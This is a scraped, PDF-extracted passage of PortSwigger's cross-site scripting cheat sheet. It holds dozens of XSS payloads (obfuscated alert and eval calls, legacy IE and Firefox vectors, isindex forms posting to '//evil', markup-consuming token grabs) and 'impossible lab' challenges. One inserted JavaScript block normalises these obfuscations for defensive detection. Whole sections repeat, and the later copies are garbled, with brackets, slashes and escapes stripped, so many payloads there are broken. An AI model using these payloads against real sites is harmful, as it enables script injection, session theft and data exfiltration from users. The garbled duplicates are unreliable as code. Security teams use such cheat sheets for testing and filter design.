<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allowed you to use = instead of :
<div style=xss=expression(alert(1))>
<div style="color&#x3dred">test</div>

Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions
<script> function window.onload(){ alert(1) } </script>
<script> function window::onload(){ alert(1) } </script>
<script> function window.location(){ } </script>
<body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body>
<body> <script> function document.body.innerHTML(){ x = '<img src=1 onerror=alert(1)>' } </script> </body>

GreyMagic HTML+TIME exploit (no longer works, even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLs after &
<a href="javascript:&%00#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities
<a href="javascript:&colo%00n;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments
<!-- %00><img title="--><iframe/onload=alert(1)>"> -->
<!-- %00><img title="--><iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>

Isindex using src attribute
<isindex type=image src=//evil?

Isindex using submit
<isindex type=submit style=width:100%;height:100%; value=XSS formaction=//evil?

Isindex and formaction
<isindex type=submit formaction=javascript:alert(1)>

Isindex and action
<isindex type=submit action=javascript:alert(1)>

Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to: James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.

Page 17: Cross-site scripting (XSS) cheat sheet - PortSwigger€¦ · Cross-site scripting (XSS) cheat sheet This cross-site scripting (XSS) cheat sheet contains many vectors that can help

XSS into a JavaScript string string concatenation(globalThis)

globalThis[ale+rt](globalThis[doc+ument][dom+ain])

XSS into a JavaScript string comment syntax(window)

window[fooalertbar](window[foodocumentbar][domain])

XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])

XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])

XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])

XSS into a JavaScript string comment syntax(parent)

parent[fooalertbar](parent[foodocumentbar][domain])

XSS into a JavaScript string comment syntax(frames)

frames[fooalertbar](frames[foodocumentbar][domain])

XSS into a JavaScript string comment syntax(globalThis)

globalThis[fooalertbar](globalThis[foodocumentbar][domain])

XSS into a JavaScript string hex escape sequence(window)

window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(self)

self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(this)

this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(top)

top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(parent)

parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(frames)

frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(globalThis)

globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)

window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)

self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)

this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)

top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)

parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)

frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]

XSS into a JavaScript string hex escape sequence

and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))

XSS into a JavaScript string octal escape sequence(window)

window[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(self)

self[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(this)

this[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(top)

top[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(parent)

parent[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(frames)

frames[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(globalThis)

globalThis[141154145162164](130123123)

XSS into a JavaScript string unicode escape(window)

window[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape(parent)

parent[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape(frames)

frames[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape(globalThis)

globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string RegExp source property (window)

window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string RegExp source property (self)

self[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string RegExp source property (this)

this[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string RegExp source property (top)

top[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string RegExp source property (parent)

parent[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string RegExp source property (frames)

frames[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string RegExp source property (globalThis)

globalThis[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string Hieroglyphy/JSFuck (window)

window[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string Hieroglyphy/JSFuck (self)

self[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string Hieroglyphy/JSFuck (this)

this[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string Hieroglyphy/JSFuck (top)

top[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string Hieroglyphy/JSFuck (parent)

parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string Hieroglyphy/JSFuck (frames)

frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string Hieroglyphy/JSFuck (globalThis)

globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
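The hex, octal, unicode and RegExp source entries above all reach the same global properties (alert, eval, atob) without the identifier ever appearing literally in the payload, which is why a filter or log search that matches on those names as plain strings misses them. The block below is an added example and not code from the PortSwigger cheat sheet: a small normaliser a defender can run over a captured parameter or a snippet from a log to decode those escape forms, fold the concatenations, and list which global properties the snippet indexes through bracket notation. SAMPLE_PAYLOADS, GLOBAL_ALIASES and SINKS are constructed for this example.

```javascript
// Added example, not part of the PortSwigger cheat sheet. Normalises the
// obfuscation forms used by the "XSS into a JavaScript string" entries
// (hex, octal and unicode escapes, RegExp .source, string concatenation)
// so a reviewer or filter can see which global property a snippet names.

// Sample payloads, constructed here to mirror the cheat sheet's variants.
// In JS source "\\x65" is the four characters backslash, x, 6, 5.
const SAMPLE_PAYLOADS = {
  hex: "parent['\\x65\\x76\\x61\\x6c'](parent['\\x61\\x6c\\x65\\x72\\x74'](parent['\\x61\\x74\\x6f\\x62']('WFNT')))",
  octal: "window['\\141\\154\\145\\162\\164']('\\130\\123\\123')",
  unicode: "globalThis['\\u0061\\u006c\\u0065\\u0072\\u0074']('\\u0058\\u0053\\u0053')",
  regexpSource: "self[/al/.source+/ert/.source](/XSS/.source)",
};

// Aliases of the global object that the cheat sheet entries index into.
const GLOBAL_ALIASES = ['window', 'self', 'this', 'top', 'parent', 'frames', 'globalThis'];

// Globals worth flagging when reachable from attacker-controlled text
// (assumed list for the example; alert is a proof of concept, not a sink).
const SINKS = ['eval', 'Function', 'setTimeout', 'setInterval', 'atob'];

// Decode \xHH, \uHHHH, \u{H..H} and octal \OOO escapes into the characters they denote.
function decodeJsStringEscapes(s) {
  return s.replace(
    /\\(x[0-9a-fA-F]{2}|u\{[0-9a-fA-F]{1,6}\}|u[0-9a-fA-F]{4}|[0-7]{1,3})/g,
    (match, esc) => {
      if (esc[0] === 'x') return String.fromCharCode(parseInt(esc.slice(1), 16));
      if (esc[0] === 'u') {
        const hex = esc[1] === '{' ? esc.slice(2, -1) : esc.slice(1);
        return String.fromCodePoint(parseInt(hex, 16));
      }
      return String.fromCharCode(parseInt(esc, 8));
    },
  );
}

// Rewrite /abc/.source as 'abc', then fold 'a'+'b' into 'ab' until nothing changes.
function normalise(snippet) {
  let s = decodeJsStringEscapes(snippet);
  s = s.replace(/\/((?:\\.|[^\/\\])+)\/\.source/g, (match, body) => `'${body}'`);
  let previous;
  do {
    previous = s;
    s = s.replace(
      /(['"])([^'"\\]*)\1\s*\+\s*(['"])([^'"\\]*)\3/g,
      (match, q1, left, q2, right) => `'${left}${right}'`,
    );
  } while (s !== previous);
  return s;
}

// Names reached through alias['name'] after normalisation, in source order.
function bracketAccessedNames(snippet) {
  const s = normalise(snippet);
  const re = new RegExp(`\\b(?:${GLOBAL_ALIASES.join('|')})\\[(['"])([^'"]*)\\1\\]`, 'g');
  const names = [];
  let m;
  while ((m = re.exec(s)) !== null) names.push(m[2]);
  return names;
}

// The subset of those names that are in SINKS. An empty result still leaves the
// fact that the global object is being indexed by a computed string, which is
// itself a reasonable thing to alert on in a parameter value.
function findDangerousSinks(snippet) {
  return bracketAccessedNames(snippet).filter((n) => SINKS.includes(n));
}

// Stand-alone run over the constructed samples.
for (const [label, payload] of Object.entries(SAMPLE_PAYLOADS)) {
  console.log(label, '->', normalise(payload),
    '| names:', bracketAccessedNames(payload).join(','),
    '| sinks:', findDangerousSinks(payload).join(',') || 'none');
}
```

The decoder deliberately does not evaluate anything: it only rewrites the escape forms and literal concatenations that the cheat sheet entries rely on, so it is safe to run over untrusted input, and it is a normalisation step rather than a complete deobfuscator (the JSFuck entries, for instance, need an evaluator to resolve).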

Impossible labs

Basic context, WAF blocks <[a-zA-Z]

This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag.

Length limit: N/A. Closest vector: N/A.

Script based injection but quotes, forward slash and backslash are escaped

We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped so you can't simply close the script block.

The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.

Length limit: N/A. Closest vector: N/A.

innerHTML context but no equals allowed

You have a site that processes the query string and URL decodes the parameters but splits on the equals, then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.

Length limit: N/A. Closest vector: N/A.

Basic context, length limit

This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it?

Length limit: 15. Closest vector: <q oncut=alert``

Attribute context, length limit

The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?

Length limit: 14. Closest vector: oncut=alert``

Basic context, length limit, arbitrary code

It's all well and good executing JavaScript, but if all you can do is call alert what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.

Length limit: 19. Closest vector: <q/oncut=eval(name)

Attribute context, length limit, arbitrary code

Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.

Length limit: 17. Closest vector: see link.

Injection occurs inside a frameset but before the body

We received a request from twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.

Length limit: N/A. Closest vector: N/A.

Injection occurs inside single quoted string, only characters a-z0-9+` are allowed

The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.

Length limit: N/A. Closest vector: N/A.

Classic vectors (XSS crypt)

Image src with JavaScript protocol

<img src=javascript:alert(1)>

Body background with JavaScript protocol

<body background=javascript:alert(1)>

Iframe data urls no longer work as modern browsers use a null origin

<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

VBScript protocol used to work in IE

<a href=vbscript:MsgBox+1>XSS</a>
<a href='' onclick=vbs:Msgbox+1>XSS</a>
<a href='' onclick=VBS:Msgbox+1>XSS</a>
<a href='' onclick=vbscript:Msgbox+1>XSS</a>
<a href='' onclick=VBSCRIPT:Msgbox+1>XSS</a>
<a href='' language=vbs onclick=vbscript:Msgbox+1>XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE

<a href='' onclick=jscript.compact:alert(1)>test</a>
<a href='' onclick=JSCRIPT.COMPACT:alert(1)>test</a>

JScript.Encode allows encoded JavaScript

<a href='' language=JScript.Encode onclick='#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@'>XSS</a>
<a href='' onclick='JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@'>XSS</a>

VBScript.Encode allows encoded VBScript

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
<iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

JavaScript entities used to work in Netscape Navigator

<a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator

<link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup

<form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL Firefox only <= 2

<div style=-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>
<div style=\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>
<div style=-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>
<div style=-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>

XBL also worked in FF3.5 using data urls

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">

CSS expressions <=IE7

<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allowed you to use = instead of :

<div style=xss=expression(alert(1))>
<div style="color&#x3d;red">test</div>

Behaviors for older modes of IE

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions

<script> function window.onload(){ alert(1) } </script>
<script> function window::onload(){ alert(1) } </script>
<script> function window.location(){ } </script>
<body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body>
<body> <script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>" } </script> </body>

GreyMagic HTML+time exploit (no longer works even in 5 docmode)

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLs after &

<a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities

<a href="javascript:&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments

<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have an onload event inside SVG

<svg><xss onload=alert(1)>

Isindex using src attribute

<isindex type=image src=//evil

Isindex using submit

<isindex type=submit style=width:100%;height:100%; value=XSS formaction=//evil

Isindex and formaction

<isindex type=submit formaction=javascript:alert(1)>

Isindex and action

<isindex type=submit action=javascript:alert(1)>

Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C, gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.

Page 18: Cross-site scripting (XSS) cheat sheet - PortSwigger€¦ · Cross-site scripting (XSS) cheat sheet This cross-site scripting (XSS) cheat sheet contains many vectors that can help

XSS into a JavaScript string hex escape sequence

and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))

XSS into a JavaScript string octal escape sequence(window)

window[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(self)

self[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(this)

this[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(top)

top[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(parent)

parent[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(frames)

frames[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(globalThis)

globalThis[141154145162164](130123123)

XSS into a JavaScript string unicode escape(window)

window[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape(parent)

parent[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape(frames)

frames[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape(globalThis)

globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string RegExp sourceproperty (window)

window[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (self)

self[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (this)

this[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (top)

top[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (parent)

parent[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (frames)

frames[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (globalThis)

globalThis[alsource+ertsource](XSSsource)

XSS into a JavaScript string HieroglyphyJSFuck(window)

window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(self)

self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(this)

this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(top)

top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(parent)

parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(frames)

frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(globalThis)

globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

Impossible labs

Classic vectors (XSS crypt)

Image src with JavaScript protocol ltimg src=javascriptalert(1)gt

Body background with JavaScript protocol ltbody background=javascriptalert(1)gt

Iframe data urls no longer work as modern browsersuse a null origin

ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt

Title Description Lengthlimit

Closest vector Link

Basic context WAFblocks lt[a-zA-Z]

This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag

NA NA 128279

Script based injectionbut quotes forwardslash and backslash areescaped

We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block

The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML

NA NA 128279

innerHTML context butno equals allowed

You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event

NA NA 128279

Basic context lengthlimit

This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it

15 ltq oncut=alert`` 128279

Attribute context lengthlimit

The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it

14 oncut=alert`` 128279

Basic context lengthlimit arbitrary code

Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code

19 ltqoncut=eval(name)

128279

Attribute context lengthlimit arbitrary code

Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript

17 See link 128279

Injection occurs inside aframeset but before thebody

We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy

NA NA 128279

Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed

The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`

NA NA 128279

VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt

JScript compact was a minimal version of JS thatwasnt widely used in IE

lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt

JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt

VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt

JavaScript entities used to work in NetscapeNavigator

lta title=ampalert(1)gtXSSltagt

JavaScript stylesheets used to be supported byNetscape Navigator

ltlink href=xssjs rel=stylesheet type=textjavascriptgt

Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme

IE9 select elements and plaintext used to consumemarkup

ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt

XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt

XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt

CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt

In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt

Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt

Older versions of IE supported event handlers infunctions

ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt

y

ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt

